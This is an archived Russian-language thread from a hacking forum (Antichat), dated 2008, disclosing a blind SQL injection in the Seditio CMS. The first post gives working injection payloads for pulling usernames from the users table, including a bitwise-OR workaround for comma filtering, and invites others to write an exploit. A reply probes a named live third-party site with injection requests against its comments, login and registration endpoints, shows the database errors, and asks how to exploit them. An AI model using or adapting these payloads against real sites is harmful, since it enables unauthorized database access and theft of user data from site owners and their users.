Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Seditio Remote Blind SQL Injection |
16.04.2008, 20:15
|
|
Познающий
Регистрация: 12.11.2007
Сообщений: 70
Провел на форуме:
1214722
Репутация:
676
|
|
Seditio Remote Blind SQL Injection
SEDITIO, ранее Neocrome, а еще ранее LDU обзавелся новым багом, реализовать который было куда интереснее, нежели обычную иньекцию, пусть даже слепую. Все дело осложняется тем, что данные из формы обрамляются запятыми с обоих сторон для последующего помещения в поисковый запрос. Уязвимым является параметр для поиск юзера в отправке личных сообщений.
Подготавливаем запрос, учитывая облом с обрамлением запятых
mysql> ') or 1=2 union select `user_name` ',xek' from sed_users/*')
-> ') or 1=2 union select `user_name` '','xek' from sed_users/*')
И получаем очередной облом - первое поле не выводится. В течение получаса было перепробавана куча вариантов, были подключены тоха и подкащей, но mysql во всех на первый взгял верных запросах возвращал ноль.
mysql> =') or 1=2 union select 123','`username`/*''*/ from sed_users/*')
-> ') or 1=2 union select 123'',''`username`/*''*/ from sed_users/*')
mysql> ') or 1=2 union select user_name+','+user_name from sed_users/*')
-> ') or 1=2 union select user_name+'',''+user_name from sed_users/*')
mysql> ') or 1=2 union select user_name+','+`user_name`+'' from sed_users/*
-> ') or 1=2 union select user_name+'',''+`user_name`+'' from sed_users/*
Вариант с подзапросами и перебором я отбросил сразу, уж слишком много запятых требовалось экранировать, да и не получалось xD Тогда на помощь пришел dev.mysql.com который сообщил мне о поразрядных функциях, вкратце напомню
mysql> SELECT 1 | 1 -- поразрядное или
-> 1
mysql> SELECT 15 & 19 -- поразрядное и
-> 13
mysql> SELECT 1 ^ 0 -- поразрядное исключающее или
-> 1
Помимо этих трех есть еще поразрядный сдвиг и инвертирование, но нам для запроса понадобятся лишь эти, точнее один из них. Это единственные функции в mysql, которые позволяют сравнивать числа с нулевой строкой и при этом даже получать результат xD
mysql> ') or ascii(substring((select user_name from sed_users limit 1)|',1'|',1'|''))>0/*
-> 1
mysql> ') or ascii(substring((select user_name from sed_users limit 1)|',1'|',1'|''))<0/*
-> 0
Описание этой баги отказались принять на милворм, потому что stroke не разобрался, решил опубликовать тут, может кто и напишет эксплоит
underWHAT?!
|
|
|
17.04.2008, 00:29
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
Какие версии уязвимы? Оффсайт не работает что-то, сам хочу посмотреть
__________________
Карфаген должен быть разрушен...
|
|
|
|
24.04.2008, 10:06
|
|
Новичок
Регистрация: 12.04.2008
Сообщений: 2
Провел на форуме:
7942
Репутация:
5
|
|
Оффсайт работает http://www.neocrome.ru/ анлг соответственно .net
На сайте sumclub.ru который работает на движке Seditio обнаружел сдедующие уязвимости
Запрос для выполнения SQL инъекции:
http://sumclub.ru/forum/comments.php?id=1'
Результат работы
<...>
pfOjA6XzpzdW1jbHViX25ldw%3D%3D; expires=Fri, 19-Jun-2037 18:54:00 GMT
MySQL error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1\' ORDER BY com_id ASC' at line 1
<...>
Запрос для выполнения SQL инъекции:
POST /forum/auth.php?m=login&a=check&redirect= HTTP/1.1
Host: sumclub.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
rusername='&rpassword=1&rcookiettl=1&x=1
Результат работы
<...>
A6XzpzdW1jbHViX25ldw%3D%3D; expires=Fri, 19-Jun-2037 19:36:09 GMT
a3
MySQL error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1
0
Запрос для выполнения SQL инъекции:
POST /forum/auth.php?m=register&a=add HTTP/1.1
Host: sumclub.ru
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
rusername=1&remail='&rpassword1=1&rpassword2=1&rlo cation=1&roccupation=1&x=1&rcountry=1
Результат работы
<...>
A6XzpzdW1jbHViX25ldw%3D%3D; expires=Fri, 19-Jun-2037 19:55:15 GMT
a3
MySQL error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1
0
что можно с этм зделать
помино обнаружено
Доступен метод TRACE
Слабая криптография
Версии протокола 1.33 и 1.5 недостаточно защищены криптографически.
Последний раз редактировалось Neoclub; 24.04.2008 в 10:11..
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид